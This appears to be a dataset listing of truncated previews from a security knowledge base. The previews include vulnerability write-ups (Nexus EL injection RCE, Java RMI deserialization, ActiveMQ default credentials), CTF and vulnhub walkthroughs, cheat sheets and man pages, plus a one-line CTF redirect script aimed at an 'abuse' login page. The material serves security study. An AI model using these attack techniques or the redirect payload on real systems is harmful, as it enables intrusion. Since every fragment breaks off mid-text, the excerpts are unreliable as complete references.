#2019移动安全事记 时间线 - 0x00 - 1.2 [What?研究者竟然可以利用智能灯泡渗透和传输敏感数据](https://www.freebuf.com/articles/wireless/191927.html) - 1.2 [2018年全球十大APT攻击事件盘点](https://www.anquanke.com/post/id/169007) - 1.3 [腾讯安全2018年高级持续性威胁(APT)研究报告](https://www.freebuf.com/articles/network/193420.html) - 1.3 [伪装成“发票到期”电子邮件,传播Neutrino僵尸网络](https://w...
sec-knowleage
--- title: Microsoft Outlook date: 2022-11-23 16:23:31.698084 background: bg-[#3a7cd1] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 210 keyboard shortcuts found in Microsoft Outlook --- Keyboard Shortcuts ------------------ ### Frequently used Shortcut | Ac...
sec-knowleage
# 面向对象思想 <!-- GFM-TOC --> * [面向对象思想](#面向对象思想) * [一、三大特性](#一三大特性) * [封装](#封装) * [继承](#继承) * [多态](#多态) * [二、类图](#二类图) * [泛化关系 (Generalization)](#泛化关系-generalization) * [实现关系 (Realization)](#实现关系-realization) * [聚合关系 (Aggregation)](#聚合关系-aggregation) * [组合关系 ...
sec-knowleage
# Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204) Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。 参考链接: - https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 - ht...
sec-knowleage
--- title: Telegram Desktop date: 2022-11-23 16:23:31.700963 background: bg-[#50a1dc] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 37 keyboard shortcuts found on the Telegram Desktop app --- Keyboard Shortcuts ------------------ ### Chats Shortcut | Action ...
sec-knowleage
# Proprietary format, re, 326p > The villains are communicating with their own proprietary file format. Figure out what it is. > proprietary.ctfcompetition.com 1337 We were given an encoded binary file of unknown format, and service to connect to. Sending some data there, we were getting some errors like `P6 expected` ...
sec-knowleage
### Git安装及设置 第一步 安装git 在 linux 下直接使用命令:sudo apt-get install git windows 下百度 gitbash ,下载安装即可 在mac 下:brew install git 第二步 基本操作 查看已有的配置信息:git config --list 创建 demo 文件夹:mkdir demo 初始化:git init 将 github 上的仓库克隆到本地:git clone [仓库地址] 查看做了哪些修改:git diff(按 q 退出) 创建a.html:touch a.html 进入编辑.gitignore:vim .gi...
sec-knowleage
# Java RMI Registry 反序列化漏洞(<jdk8u232_b09) Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1). 自jdk8u121起,Registry对反序列化的类做了白名单限制 ```java if (String.class == clazz ...
sec-knowleage
--- title: Python date: 2020-12-23 18:41:20 background: bg-[#436b97] tags: - script - interpret categories: - Programming intro: | The [Python](https://www.python.org/) cheat sheet is a one-page reference sheet for the Python 3 programming language. plugins: - copyCode --- Getting Started ----------...
sec-knowleage
# InsomniHack Teaser CTF 2018 Team: c7f.m0d3, sasza, nazywam, akrasuski1, ppr, rodbert, hubert, borysp, rev, cr019283, psrok1, shalom ### Table of contents * [MagicHat (pwn)](pwn_magic_hat) * [Cool Storage Service (web)](web_css)
sec-knowleage
# 认证 & 授权 > 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 --- **相关文章** - [看完这篇 Session、Cookie、Token,和面试官扯皮就没问题了](https://www.cnblogs.com/cxuanBlog/p/12635842.html) - [还分不清 Cookie、Session、Token、JWT?](https://zhuanlan.zhihu.com/p/164696755) --- ## 基础 **什么是认证(Authentication)** 验证当前用户的身份,证明“你是你自己” 场景 - 用户名密码登录 - 邮箱发送登录链接 - 手机号接收验证码 - 只要你能收到...
sec-knowleage
<script> location.replace('http://'+parseInt(Math.random()*1e15)+'-abuse.web.ctfcompetition.com/login'); </script>
sec-knowleage
## Reverse 300 (re, 300p) ### PL [ENG](#eng-version) Dostajemy [program](./r300.exe) (tym razem PE windowsowe), który pobiera od usera parę username:hasło. Mamy zdobyć hasło dla użytkownika "Administrator". Okazuje się dodatkowo że są zabezpieczenia przed bezpośrednim zapytaniem o hasło dla usera "Administrator". Prog...
sec-knowleage
# sword Binary Exploitation, 800 points ## Description: > Can you spawn a shell and get the flag? ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <signal.h> #define MAX_SWORD_NUM 6 #define READ_INT_BUF_LEN 32 #define MAX_SWORD_LEN 0x100 #define FORGE_TIME 2 #define AL...
sec-knowleage
# DC8-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶机地址** - https://www.vulnhub.com/entry/dc-8,367/ **Description** DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between ...
sec-knowleage
repquota === 报表的格式输出磁盘空间限制的状态 ## 补充说明 **repquota命令** 以报表的格式输出指定分区,或者文件系统的磁盘配额信息。 ### 语法 ```shell repquota(选项)(参数) ``` ### 选项 ```shell -a:列出在/etc/fstab文件里,有加入quota设置的分区的使用状况,包括用户和群组; -g:列出所有群组的磁盘空间限制; -u:列出所有用户的磁盘空间限制; -v:显示该用户或群组的所有空间限制。 ``` ### 参数 文件系统:要打印报表的文件系统或者对应的设备文件名。 ### 实例 显示所有文件系统的磁盘使用情况 ```shell repquota...
sec-knowleage
## The Names Window The Names window, provides a summary listing of all of the global names within a binary. A name is nothing more than a symbolic description given to a program virtual address. IDA initially derives the list of names from symbol-table and signature analysis during the initial loading of a file. Names...
sec-knowleage
# Delegatecall > There exists a special variant of a message call, named delegatecall which is identical to a message call apart from the fact that the code at the target address is executed in the context of the calling contract and msg.sender and msg.value do not change their values. ## 原理 ### 三种调用函数 在 Solidity 中,cal...
sec-knowleage
'\" '\" Copyright (c) 1995-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: vwait.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\" '\" The definitions below are for supplemental mac...
sec-knowleage
.TH XXD 1 "August 1996" "Manual page for xxd" .\" .\" 21st May 1996 .\" Man page author: .\" Tony Nugent <tony@sctnugen.ppp.gu.edu.au> <T.Nugent@sct.gu.edu.au> .\" Changes by Bram Moolenaar <Bram@vim.org> .SH NAME .I xxd \- 以十六进制形式表示 .SH "总览 (SYNOPSIS)" .B xxd \-h[elp] .br .B xxd [options] [infile [outfile]] .br ...
sec-knowleage
# ActiveMQ未授权访问漏洞 ## 漏洞描述 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ管理控制台的默认管理用户名和密码分别为admin和admin,用户可以未经授权使用默认凭据直接访问服务器,导致敏感信息泄露,并进一步进行攻击。 ## 环境搭建 Download: http://archive.apache.org/dist/activemq/apache-activemq/5.5.0/apache-activemq-5.5.0-bin.tar.gz ``` [root@l...
sec-knowleage
# kubernetes-goat ## 简介 Kubernetes Goat 是一个交互式 Kubernetes 安全学习游乐场。它在设计场景中故意易受攻击,以展示 Kubernetes 集群、容器和云原生环境中的常见错误配置、现实漏洞和安全问题。 Kubernetes Goat 有 20 多个场景,涵盖攻击、防御、最佳实践、工具等,包括: - 代码库中敏感密钥 - Docker-in-Docker的漏洞利用 - Kubernetes (K8S) 中的 SSRF - 容器逃逸到主系统 - Docker CIS 基准分析 - Kubernetes CIS 基准分析 - 攻击私有仓库 - NodePort 暴露的服务 - Helm v...
sec-knowleage
原文 by [阿里聚安全](https://zhuanlan.zhihu.com/p/31795470?group_id=922141315996553216) ## 0x00 引言 近日,中共中央办公厅、国务院办公厅印发了《推进互联网协议第六版(IPv6)规模部署行动计划》,加快推进IPv6规模部署,构建高速率、广普及、全覆盖、智能化的下一代互联网。 随着计划实施推行以及移动互联网、物联网的大力发展,我国整个网络环境将发生翻天覆地的变化,全产业链已蓄势待发,目前IPv6根服务器架设中国开始部署,IPv6城域网、政府网站IPv6双栈化改造、IPv6城市公共无线网络等均已开始试点和部署,互联网BAT部分内容已支持IPv6访问,...
sec-knowleage
## Sleeping guard (Crypto, 50p) ###ENG [PL](#pl-version) In the task we get code: ```python import base64 from twisted.internet import reactor, protocol import os PORT = 9013 import struct def get_bytes_from_file(filename): return open(filename, "rb").read() KEY = "[CENSORED]" def length_encryption_key(): r...
sec-knowleage
import logging import sys from pathlib import Path from typing import Optional import httpx from github import Github from github.PullRequest import PullRequest from pydantic import BaseModel, BaseSettings, SecretStr, ValidationError github_api = "https://api.github.com" class Settings(BaseSettings): github_rep...
sec-knowleage